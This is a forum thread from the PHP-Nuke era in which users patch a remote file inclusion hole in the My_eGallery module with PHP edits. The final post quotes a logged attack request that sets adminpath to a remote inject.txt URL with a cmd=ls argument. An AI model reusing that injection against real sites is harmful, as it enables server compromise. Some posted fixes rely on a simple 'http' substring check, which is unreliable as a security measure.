My_eGallery Security Exploit Fix

Corporal Joined: Jun 03, 2003 Posts: 54 Location: France

After analyzing the My_eGallery exploit, I found out, that the responsible module is /modules/My_eGallery/public/displayCategory.php

To fix quickly the issue insert in the second line after
<?php

the following code:

$bug = strpos($basepath,"http");
if ($bug === false) {

and at the end of the file before ?>

}
else {
echo "You are trying to hack our site! GO AWAY BASTARD!";
}

This will avoid that someone can inject php code from outside the Webserver!

Nuke Soldier Joined: Oct 13, 2003 Posts: 22

This fix prevents that the attacker take advantage of that bug of security?

Greetings and thanks Cool

Corporal Joined: Jun 03, 2003 Posts: 54 Location: France

Yes, it tests if someone injected a new value for $basepath contain http

Nuke Soldier Joined: Oct 13, 2003 Posts: 22

How we can verify it? in http://lottasophie.sourceforge.net a patch exists but for the version 3.1.1g, I believe that a patch for version 2.7.9 could be done based of the patch for the version 3.1.1g Cool

Corporal Joined: Jun 03, 2003 Posts: 54 Location: France

You want to have a 100% fix? Just replace the $basepath variable with the realpath in the first 2 lines starting with include (".....

Then it is 100% fixed for this vulnerability...

Nuke Soldier Joined: Oct 13, 2003 Posts: 22

how?

Code:

include ("$basepath/public/imageFunctions.php");
include ("$adminpath/fileFunctions.php");

replace with:

Code:

include_once 'modules/My_eGallery/public/imageFunctions.php';
include_once 'modules/My_eGallery/fileFunctions.php';

It is well?

Nuke Soldier Joined: Oct 13, 2003 Posts: 22

Or only replace the $basepath line with the real path? Question

Corporal Joined: Jun 03, 2003 Posts: 54 Location: France

Exactly! Just put those 2 lines:

include ("modules/My_eGallery/public/imageFunctions.php");
include ("modules/My_eGallery/fileFunctions.php");

Nuke Soldier Joined: Oct 13, 2003 Posts: 22

Thanks, already I have done it and everything seems to march well Cool

But I have done it how have it in fix of 3.0.1g works truth also well?

Nuke Soldier Joined: Oct 13, 2003 Posts: 22

Code:

include_once 'modules/My_eGallery/public/imageFunctions.php';
include_once 'admin/modules/gallery/fileFunctions.php';

and

Code:

include ("modules/My_eGallery/public/imageFunctions.php");
include ("admin/modules/gallery/fileFunctions.php");

It is the same?

I have modified this message, since I detected an error that it had there, but that already has been corrected, thanks johnnycard for the observation.

Only I have had left the doubt that I am raising to them in this message, I believe that I have it well.

Corporal Joined: May 29, 2003 Posts: 52 Location: UK

The admin path on my version (2.7.9) differs, I had to replace the first 2 lines with... (note 2nd line for admin path)

Code:

include ("modules/My_eGallery/public/imageFunctions.php");
include ("admin/modules/gallery/fileFunctions.php");

Thanks Laffer, I hope this does the trick

Nuke Cadet Joined: Dec 17, 2003 Posts: 1

I am the maintainer of MeG for PostNuke, and I am glad that I found this thread.

Please be aware that in the PHPNuke version of MeG the displayCategory.php is not the only file with that vulnerability! So I am not sure if you really got a 100% fixed version.

If anybody knows a maintainer of MeG for PHPNuke please let me know as I am searching someone to discuss the issues with.

Contact me by jnapp at users dot sf dot net

Jörg
http://lottasophie.sf.net

Corporal Joined: Jun 03, 2003 Posts: 54 Location: France

Hello Joerg,

there is no official maintainer, but I will take the role to fix the Gallery, because I have a big site running MeG. We can talk german if you like (it seems you are german like me) and you can contact me by mail webmaster@comicfan.de

Posted: Sun Dec 28, 2003 4:27 pm

Im Running a Huge Gallery too; do you guys found the Fix for other file than displaycategory.php?

Posted: Sun Jan 04, 2004 7:46 pm

The basepath bug is not the only hole. I found an executable file namd 4000 in my /modules/My_eGallery/public folder today. Tracing back the logs, I found the following:

Code:

203.130.195.89 - - [30/Dec/2003:05:57:27 -0700] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=http://<truncated>/inject.txt?&cmd=ls HTTP/1.1" 200 385 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt; FunWebProducts)"

The execuble lauches some type of daemon. Not sure what it does. If someone at nukecops would like a copy of it and the inject.txt script, msg me and I'll send them to you - maybe you can figure out what they do.

I patched displayCategory.php in My_eGallery to block further hack attempts by modifying the original basepath fix by adding the following:

Top of displayCategory.php:

Code:

$bug = strpos($basepath,"http");
$bug2 = strpos($adminpath,"http");
if ($bug === false AND $bug2 === false) {

End of displayCategory.php:

Code:

else {
echo "Yeah, I don't think so dipshit...";
}

As far as I can tell, by host's firewall blocked outgoing traffic on the as-yet unknown TCP or UDP port the script binds to, so luckily nothing in my database or site appears to have been changed. Anyone using My_eGallery should make this change post-haste.